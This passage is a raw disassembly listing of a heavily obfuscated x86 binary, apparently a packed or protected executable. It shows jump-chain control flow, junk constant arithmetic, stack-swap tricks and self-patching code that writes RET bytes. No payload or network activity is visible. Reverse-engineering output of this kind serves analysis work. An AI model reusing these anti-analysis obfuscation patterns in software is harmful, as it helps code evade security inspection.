; FUNCTION CHUNK AT 0043C00C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043C956 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CAAE SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043CECD SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043D922 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043EF18 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440A02 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044235E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00442A97 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00442ED3 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004431D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044403F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00444847 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044640E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00446572 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004465C3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004469AF SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00447B05 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447E6D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004482D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448EAB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449144 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044922D SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044A3DD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A3EE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044A900 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AE77 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B1E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C720 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044D25A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044D562 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D5AE SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044DC74 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E273 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044ECEE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004501EB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004501F5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00450884 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450C34 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00451B08 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004525CE SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00452923 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00453450 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004547C3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004552FF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045540E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004556CC SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0045598B SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00455EB9 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00456325 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00456348 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456BF5 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00456D9B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045763F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004587AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045887D SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00459336 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459F1A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A5FA SIZE 00000005 BYTES

		push	edi
		push	36A222CBh
		pop	edi
		jmp	loc_44E273
sub_43CCD0	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43CCDC	proc near		; CODE XREF: k2vbe3.d:00441496j
					; k2vbe3.d:loc_442AE0p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044CCB5 SIZE 0000001C BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	eax, [esp-4+arg_0]
		push	esi
		mov	esi, edx
		xchg	esi, [esp+0]
		push	edi
		jmp	loc_44CCB5
sub_43CCDC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_43CCEF:				; CODE XREF: sub_4553CC-B778j
		ror	ecx, 8
		rol	ecx, 0Ch
		popf
		jmp	loc_4550BB
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------

loc_43CCFB:				; CODE XREF: k2vbe3.d:0044A868j
		jle	loc_449DA4

; =============== S U B	R O U T	I N E =======================================



sub_43CD01	proc near		; CODE XREF: sub_45929A+6p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044394A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00443CB7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004484C3 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044BEA9 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00458EB2 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		pop	ebx
		jmp	loc_443CB7
sub_43CD01	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_43CD0B:				; CODE XREF: k2vbe3.d:00459D04j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_43CD0C:				; CODE XREF: sub_444EFA-8BB8j
		jmp	loc_44AB2B
; END OF FUNCTION CHUNK	FOR sub_444EFA
; ---------------------------------------------------------------------------

loc_43CD11:				; CODE XREF: k2vbe3.d:0043E1B6j
		mov	eax, ebx
		sub	ebp, eax
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_43CD15:				; CODE XREF: sub_44C90E-CCFFj
		or	eax, 0ED70F894h
		test	eax, 10h
		jmp	loc_43DD54
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

locret_43CD26:				; CODE XREF: k2vbe3.d:004487CDj
		retn
; ---------------------------------------------------------------------------
		jns	loc_459E55
		jmp	sub_45929A

; =============== S U B	R O U T	I N E =======================================



sub_43CD32	proc near		; CODE XREF: sub_4501CC+7p
					; k2vbe3.d:004555BBj

; FUNCTION CHUNK AT 00443C04 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00447982 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		cmp	dword ptr [eax-0Ch], 4
		jnz	loc_443C04
		add	dword ptr [ebp-8], 4
		jmp	loc_45A33E
sub_43CD32	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44660F

loc_43CD49:				; CODE XREF: sub_44660F:loc_452EE3j
					; k2vbe3.d:00452EFAj
		push	offset sub_45812F
		jmp	nullsub_272
; END OF FUNCTION CHUNK	FOR sub_44660F

; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_43CD53	proc near		; CODE XREF: k2vbe3.d:0044E0CAj
					; sub_44E8BE+5p
		xchg	edx, [esp+0]
		pop	edx
		mov	ds:dword_41E0EC, eax
		lea	eax, sub_4559F4
		mov	byte ptr [eax],	0C3h
		jmp	sub_4559F4
sub_43CD53	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43CD6B:				; CODE XREF: k2vbe3.d:004559FAj
		mov	eax, [esp]
		push	ebx
		jmp	loc_44A147
; ---------------------------------------------------------------------------

loc_43CD74:				; CODE XREF: k2vbe3.d:0044CD2Aj
					; k2vbe3.d:0045A7B1j
		xchg	eax, [esp]
		mov	edx, eax
		push	offset sub_44CD78
		jmp	locret_452D31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D316

loc_43CD83:				; CODE XREF: sub_44D316-9BAAj
		mov	eax, [ebp+8]
		or	dword ptr [eax-8], 8
		jmp	loc_44E9F1
; END OF FUNCTION CHUNK	FOR sub_44D316
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_43CD8F:				; CODE XREF: sub_456666-131B6j
					; sub_456666+2Fj
		cmp	dword ptr [ebp-1Ch], 67h
		jnz	loc_457852
		mov	eax, 6
		sub	eax, [ebp-4]
		jmp	loc_44D33D
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_43CDA6:				; CODE XREF: sub_441D41+9A40j
		jge	loc_448BEE
		mov	[esi], ecx
		sbb	ecx, 47172710h
		and	ecx, 648FA90Ch
		xchg	eax, ebx
		jmp	loc_448BEE
; END OF FUNCTION CHUNK	FOR sub_441D41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518D8

loc_43CDC1:				; CODE XREF: sub_4518D8:loc_459E91j
		push	offset sub_451A7C
		jmp	loc_45018D
; END OF FUNCTION CHUNK	FOR sub_4518D8

; =============== S U B	R O U T	I N E =======================================



sub_43CDCB	proc near		; DATA XREF: k2vbe3.d:0045BFC7o
		add	edx, 7B9ED961h
		test	eax, edx
		call	sub_43FCA0

loc_43CDD8:				; CODE XREF: k2vbe3.d:00450DB5j
		jmp	loc_4431E0
sub_43CDCB	endp

; ---------------------------------------------------------------------------
		test	ebx, 0D22229Ah
		jmp	loc_44FEE7
; ---------------------------------------------------------------------------

loc_43CDE8:				; CODE XREF: k2vbe3.d:loc_44F84Cj
		cmp	eax, 0D8E84h
		jmp	loc_454FE3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4568DA

loc_43CDF3:				; CODE XREF: sub_4568DA-576Aj
		pop	edi

loc_43CDF4:				; CODE XREF: sub_4568DA:loc_446BA4j
		movzx	eax, word ptr [ebp-6]
		mov	[ebp-1Ch], eax
; END OF FUNCTION CHUNK	FOR sub_4568DA
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_43CDFB:				; CODE XREF: sub_450F71:loc_44BD10j
					; sub_44DCF5:loc_458346j
		mov	eax, [ebp-18h]
		jmp	loc_43C6D7
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
		popf
		jmp	sub_442DF0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_129. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43CE0A:				; CODE XREF: k2vbe3.d:00443E4Aj
		jmp	loc_459E54
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE0A

loc_43CE0F:				; CODE XREF: sub_43FE0A+204Aj
		jmp	nullsub_130
; END OF FUNCTION CHUNK	FOR sub_43FE0A
; ---------------------------------------------------------------------------
		test	ecx, ebp
		jmp	loc_455245
; ---------------------------------------------------------------------------

loc_43CE1B:				; CODE XREF: k2vbe3.d:loc_456571j
					; k2vbe3.d:00456583j
		add	edi, 99912C9h
		add	edi, ebp
		add	edi, 97988D09h
		mov	[edi], eax
		pop	edi
		push	offset loc_447B2A
		jmp	locret_442EE3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_43CE36:				; CODE XREF: sub_443FC1+112C9j
		mov	[esi], ebp
		cmp	ebp, 0E396CDDBh
		jmp	loc_45BBE3
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E470

loc_43CE43:				; CODE XREF: sub_43E470+B09Aj
		jnz	loc_447AAE

loc_43CE49:				; CODE XREF: sub_44B58F+F163j
		jmp	loc_4473EB
; END OF FUNCTION CHUNK	FOR sub_43E470
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EC4A

loc_43CE4E:				; CODE XREF: sub_44EC4A+7882j
		jmp	sub_451759
; END OF FUNCTION CHUNK	FOR sub_44EC4A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FB6

loc_43CE53:				; CODE XREF: sub_442FB6+9D9Cj
		jmp	loc_44BE96
; END OF FUNCTION CHUNK	FOR sub_442FB6
; ---------------------------------------------------------------------------
		pushf
		shr	ecx, 19h
		jmp	loc_447AAC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_418. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FBB2

loc_43CE62:				; CODE XREF: sub_44FBB2+B207j
		jmp	sub_44B2D7
; END OF FUNCTION CHUNK	FOR sub_44FBB2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C0CD

loc_43CE67:				; CODE XREF: sub_45C0CD-19659j
		jmp	loc_43C396
; END OF FUNCTION CHUNK	FOR sub_45C0CD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A634

loc_43CE6C:				; CODE XREF: sub_45A634-1DD9Bj
		popf
		ror	ecx, 12h
		xor	eax, 90FD0FD0h

loc_43CE76:				; CODE XREF: sub_45A634:loc_44A40Dj
		mov	eax, [ebp-0Ch]
		push	eax
		call	sub_43E282

loc_43CE7F:				; CODE XREF: sub_45A634+186Cj
		push	offset loc_45B546
		jmp	nullsub_488
; END OF FUNCTION CHUNK	FOR sub_45A634
; ---------------------------------------------------------------------------

loc_43CE89:				; CODE XREF: k2vbe3.d:loc_4593ADj
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp]
		call	sub_445047
		mov	eax, 4CF1C9EDh
		push	ecx
		jmp	loc_44AB26
; ---------------------------------------------------------------------------

locret_43CE9F:				; CODE XREF: k2vbe3.d:0045B68Cj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45346B

loc_43CEA0:				; CODE XREF: sub_45346B+10j
		jmp	loc_447DB7
; END OF FUNCTION CHUNK	FOR sub_45346B
; ---------------------------------------------------------------------------
		call	sub_4448B3

loc_43CEAA:				; CODE XREF: k2vbe3.d:0045204Fj
		jmp	loc_449155
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44067C

loc_43CEAF:				; CODE XREF: sub_44067C+Aj
		add	ebx, 0C3ECD382h
		jns	loc_4403FC
		jl	loc_45C16C
		jmp	loc_4403F9
; END OF FUNCTION CHUNK	FOR sub_44067C
; ---------------------------------------------------------------------------

loc_43CEC6:				; CODE XREF: k2vbe3.d:00446C9Ej
		rol	ebx, 2

; =============== S U B	R O U T	I N E =======================================



sub_43CEC9	proc near		; CODE XREF: sub_453DF7+6p
		xchg	esi, [esp+0]
		pop	esi
sub_43CEC9	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_43CECD:				; CODE XREF: sub_43CCD0:loc_4556D8j
		call	sub_45B20A

loc_43CED2:				; CODE XREF: sub_447266:loc_43FCF6j
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_45598B
		jmp	loc_4587AD
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
		not	ecx
		jmp	loc_443A2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4EE

loc_43CEEB:				; CODE XREF: sub_45B4EE-187DEj
		sub	edx, 23888513h
		pop	ebp
		add	esi, ebx
		jmp	loc_43F6FD
; END OF FUNCTION CHUNK	FOR sub_45B4EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_43CEF9:				; CODE XREF: sub_44BDBB+D81Cj
		push	0E8299F82h

loc_43CEFE:				; CODE XREF: sub_44BDBB:loc_44E660j
		mov	eax, 0DD70DD34h
		push	esi
		push	92B57C38h
		pop	esi
		and	esi, 0EB2BB72Bh
		add	esi, 7E229A7Dh
		jmp	loc_43F4B9
; END OF FUNCTION CHUNK	FOR sub_44BDBB

; =============== S U B	R O U T	I N E =======================================



sub_43CF1B	proc near		; CODE XREF: k2vbe3.d:0043D51Ep
					; k2vbe3.d:00451E37j
		xchg	eax, [esp+0]
		pop	eax
		mov	byte ptr [eax],	0C3h
		jmp	loc_4596BD
sub_43CF1B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A58

loc_43CF27:				; CODE XREF: sub_457A58:loc_4596BDj
		xchg	eax, [esp+0]
		mov	edx, eax
		pop	eax
		mov	eax, [esp-4+arg_0]
		jmp	loc_43C113
; END OF FUNCTION CHUNK	FOR sub_457A58

; =============== S U B	R O U T	I N E =======================================



sub_43CF35	proc near		; DATA XREF: sub_45C27A-6665o

; FUNCTION CHUNK AT 00448853 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00454436 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455015 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004552B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045967D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B288 SIZE 00000007 BYTES

		add	eax, 59305EE4h
		mov	dword ptr [eax], 737361h
		push	0
		lea	eax, [ebp-20h]
		jmp	loc_4552B3
sub_43CF35	endp

; ---------------------------------------------------------------------------
		xchg	esi, ebx
		jmp	loc_456CD9

; =============== S U B	R O U T	I N E =======================================



sub_43CF52	proc near		; CODE XREF: k2vbe3.d:loc_43EAC6p
					; sub_446478:loc_449082j

arg_C		= dword	ptr  10h

; FUNCTION CHUNK AT 0043C7B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B5BA SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004511B6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004597D2 SIZE 00000014 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_441E39
		push	eax
		jmp	loc_4511B6
sub_43CF52	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43CF61:				; CODE XREF: k2vbe3.d:004474D3j
		pop	esi

; =============== S U B	R O U T	I N E =======================================



sub_43CF62	proc near		; CODE XREF: sub_44E39D+946Ap

arg_0		= dword	ptr  4
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

; FUNCTION CHUNK AT 0043F81B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044D6A1 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045B42B SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		or	edx, ebx
		or	edx, 8EFDED90h
		xor	eax, ebx
		add	ecx, edx
		sub	ebx, ecx
		jmp	loc_44D6A1
sub_43CF62	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441172

loc_43CF79:				; CODE XREF: sub_441172+12551j
		call	sub_448735

loc_43CF7E:				; CODE XREF: sub_450983-12A1Cj
		jmp	loc_43C848
; END OF FUNCTION CHUNK	FOR sub_441172
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454639

loc_43CF83:				; CODE XREF: sub_454639:loc_43F2A7j
					; k2vbe3.d:004465F2j
		or	esi, 0C95B6Dh
		add	esi, 7D59CC25h
		mov	[esi], eax
		call	sub_44642C

loc_43CF96:				; CODE XREF: k2vbe3.d:00455BF5j
		jmp	nullsub_234
; END OF FUNCTION CHUNK	FOR sub_454639
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442700

loc_43CF9B:				; CODE XREF: sub_442700-1AEDj
		jmp	loc_454BE4
; END OF FUNCTION CHUNK	FOR sub_442700
; ---------------------------------------------------------------------------
		dd 0F8158A0Fh, 14E90000h
		db 3Dh,	1, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F1

loc_43CFAB:				; CODE XREF: sub_44D2F1+132Ej
		add	edx, 0CF23CB60h
		or	edx, 791A3EADh
		xor	edx, 237651Fh
		add	edx, 97EAE61Dh
		call	sub_45B20A
		push	esi
		mov	esi, eax
		xchg	esi, [esp+4+var_4]
		jmp	loc_44BB10
; END OF FUNCTION CHUNK	FOR sub_44D2F1
; ---------------------------------------------------------------------------

loc_43CFD3:				; DATA XREF: sub_4511F7+B7Fo
		mov	eax, [esp]
		push	edi
		mov	edi, edx
		xchg	edi, [esp]
		call	sub_44A7C2
		mov	eax, 637A7446h
		call	sub_4553CC
		mov	ds:off_41E140, eax
		jmp	loc_43FC15
; ---------------------------------------------------------------------------

loc_43CFF6:				; DATA XREF: sub_4490B2-23EDo
		pop	edx
		mov	eax, [esp]
		push	edx
		push	eax
		push	0CDD8DF1Ah
		pop	eax
		jmp	loc_441EDB
; ---------------------------------------------------------------------------
		mov	esi, 0C9B77951h
		jmp	sub_44DF16
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_268. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_43D012:				; CODE XREF: sub_44B94B:loc_43C645j
		jnz	loc_45571B
		jmp	loc_453C60
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------

loc_43D01D:				; CODE XREF: k2vbe3.d:00441C0Ej
		jb	loc_44B3DD

; =============== S U B	R O U T	I N E =======================================



sub_43D023	proc near		; CODE XREF: k2vbe3.d:00440573p

; FUNCTION CHUNK AT 00440AF5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044266B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446B47 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044B34F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C437 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EFFE SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004501FF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451E9C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453402 SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		pop	eax
		cmp	al, 0A4h
		jz	loc_44266B

loc_43D02F:				; CODE XREF: k2vbe3.d:00442612j
		jmp	loc_44C437
sub_43D023	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4530DF

loc_43D034:				; CODE XREF: sub_4530DF+6252j
		add	eax, 26AC1678h
		mov	eax, [eax]
		push	edi
		mov	edi, eax
		xchg	edi, [esp+4+var_4]
		jmp	loc_4522D4
; END OF FUNCTION CHUNK	FOR sub_4530DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_43D047:				; CODE XREF: sub_44DD31:loc_44896Cj
		jle	loc_443453
		and	ebp, edx
		shr	eax, 6
		xor	edx, eax
		or	ecx, edi

loc_43D056:				; CODE XREF: k2vbe3.d:loc_44EA67j
		mov	eax, [esp+0]
		jmp	loc_4460C2
; END OF FUNCTION CHUNK	FOR sub_44DD31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_43D05E:				; CODE XREF: sub_440C94-A6Fj
		xor	esi, 595CE406h

loc_43D064:				; CODE XREF: sub_440C94:loc_440DA4j
		mov	eax, [esp+0]
		call	sub_43DA01

loc_43D06C:				; CODE XREF: sub_440C94+8181j
					; k2vbe3.d:0044FF4Fj
		xchg	eax, [esp+0]
		jmp	loc_4404EA
; END OF FUNCTION CHUNK	FOR sub_440C94

; =============== S U B	R O U T	I N E =======================================



sub_43D074	proc near		; DATA XREF: sub_44B912-1E2Co
		pop	esi
		add	eax, 18h
		mov	[ebp-14h], eax
		call	sub_43C779
sub_43D074	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4505F8

loc_43D080:				; CODE XREF: sub_4505F8+84C1j
		xchg	esi, [esp+4+var_4]
		push	esi
		pop	ebp
		pop	esi
		push	19C8C173h
		jmp	loc_43FA74
; END OF FUNCTION CHUNK	FOR sub_4505F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446382

loc_43D090:				; CODE XREF: sub_446382+19j
					; k2vbe3.d:loc_4575D9j
		call	sub_44F817
; END OF FUNCTION CHUNK	FOR sub_446382
; START	OF FUNCTION CHUNK FOR sub_44D3A3

loc_43D095:				; CODE XREF: sub_44D3A3:loc_441FE6j
		mov	[ebp-8], edx
		mov	[ebp-4], eax
		xor	eax, eax
		mov	[ebp-0Ch], eax
		cmp	dword ptr [ebp-4], 0
		jmp	loc_44F187
; END OF FUNCTION CHUNK	FOR sub_44D3A3

; =============== S U B	R O U T	I N E =======================================



sub_43D0A9	proc near		; CODE XREF: sub_4425EA:loc_44CFB7j
					; sub_45439Ep ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004425F9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00443B64 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00445467 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00448B18 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B0CE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044BE39 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F5FE SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044F847 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045559B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00458448 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045B8FF SIZE 00000023 BYTES

		jns	loc_4425F9
		xchg	eax, [esp+0]
		mov	edx, eax
		pop	eax
		jmp	loc_44BE39
sub_43D0A9	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43D0BA	proc near		; DATA XREF: sub_454AD4+7843o

; FUNCTION CHUNK AT 00450DD7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B085 SIZE 0000001C BYTES

		push	76EEECEAh
		pop	edx
		add	edx, ds:4000F0h
		rol	edx, 11h
		add	edx, 0FEF95A61h
		jmp	loc_450DD7
sub_43D0BA	endp

; ---------------------------------------------------------------------------

loc_43D0D4:				; CODE XREF: k2vbe3.d:0044557Dj
		push	edx
		push	3E3BA413h
		pop	edx
		and	edx, 1FEE9046h
		add	edx, 0E1D57FFEh
		xchg	edx, [esp]
		mov	eax, [ebp-4]

loc_43D0ED:				; CODE XREF: k2vbe3.d:loc_455044j
		push	esi
		jmp	loc_44D35C
; ---------------------------------------------------------------------------
		call	sub_4436CE
		push	53995FD0h
		pop	edx
		rol	edx, 9
		jmp	loc_459A1F
; ---------------------------------------------------------------------------

loc_43D106:				; DATA XREF: sub_4541C2+7o
		cmp	byte ptr [eax],	0E8h
		jnz	loc_44C005
		mov	eax, [ebp-4]
		inc	eax
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_43D113:				; CODE XREF: sub_44B94B-D451j
		mov	eax, [eax]
		add	eax, [ebp-4]
		jmp	loc_44BFF6
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_4460C7
		jmp	loc_453019
; ---------------------------------------------------------------------------

loc_43D12A:				; DATA XREF: sub_43D0BA+1DFDDo
		cmp	al, 0A4h
		jz	loc_44503A
		jmp	loc_448991
; ---------------------------------------------------------------------------

loc_43D137:				; DATA XREF: k2vbe3.d:004473BBo
		mov	ebp, ecx
		xchg	ebp, [esp]
		push	1E399295h
		pop	ecx
		jmp	loc_44FF8D
; ---------------------------------------------------------------------------
		xchg	esi, ebx
		jmp	loc_43E851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BDF

loc_43D14E:				; CODE XREF: sub_443BDF:loc_44692Ej
		jnz	loc_44522F
; END OF FUNCTION CHUNK	FOR sub_443BDF
; START	OF FUNCTION CHUNK FOR sub_446CCF

loc_43D154:				; CODE XREF: sub_446CCF+AB02j
		jmp	loc_44D5EE
; END OF FUNCTION CHUNK	FOR sub_446CCF
; ---------------------------------------------------------------------------
		sbb	ebx, 0C13AEEC2h
		jmp	loc_445222
; ---------------------------------------------------------------------------

loc_43D164:				; CODE XREF: k2vbe3.d:00446EBBj
		jns	loc_44B465
		mov	edi, 0DEC1B00Fh

loc_43D16F:				; CODE XREF: k2vbe3.d:loc_456FA9j
		mov	eax, [esp]
		push	ebx
		push	0BEE918A7h
		jmp	loc_459A1A
; ---------------------------------------------------------------------------

loc_43D17D:				; CODE XREF: k2vbe3.d:loc_4420B0j
		pop	edx
		sub	edx, 0DD0C2F65h
		add	edx, 6E000A9Fh
		xchg	edx, [esp]
		jmp	sub_4479A1
; ---------------------------------------------------------------------------
		pop	edx
		jz	loc_446E6A
		mov	eax, [esp]
		push	ecx
		jmp	loc_441546
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_43D1A2:				; CODE XREF: sub_444D7B:loc_452651j
		jge	loc_44BF17
; END OF FUNCTION CHUNK	FOR sub_444D7B
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_43D1A8:				; CODE XREF: sub_43F7AC+1C79Bj
		jmp	loc_45956F
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452092

loc_43D1AD:				; CODE XREF: sub_452092+Dj
					; k2vbe3.d:00454313j
		jmp	loc_43DB60
; END OF FUNCTION CHUNK	FOR sub_452092
; ---------------------------------------------------------------------------
		cmp	ebp, 0CB6B51DBh
		jmp	loc_43F15E
; ---------------------------------------------------------------------------

loc_43D1BD:				; CODE XREF: k2vbe3.d:loc_44AC7Aj
		jz	loc_450505
